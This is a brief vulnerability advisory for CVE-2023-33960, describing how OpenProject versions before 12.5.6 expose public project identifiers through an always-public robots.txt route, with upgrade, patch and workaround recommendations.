CVE-2023-33960

Name of the Vulnerable Software and Affected Versions OpenProject versions prior to 12.5.6

Description OpenProject is web-based project management software. A robots.txt file is generated to denote which routes shall or shall not be accessed by crawlers, containing project identifiers of all public projects in the instance. Even if the entire instance is marked as Login required, the /robots.txt route remains publicly available prior to version 12.5.6.

Recommendations For versions prior to 12.5.6, update to version 12.5.6 to resolve the issue. Alternatively, for versions greater than 10.0, download and apply the provided patchfile. As a temporary workaround, consider marking public projects as non-public and granting membership to those who need access to the project.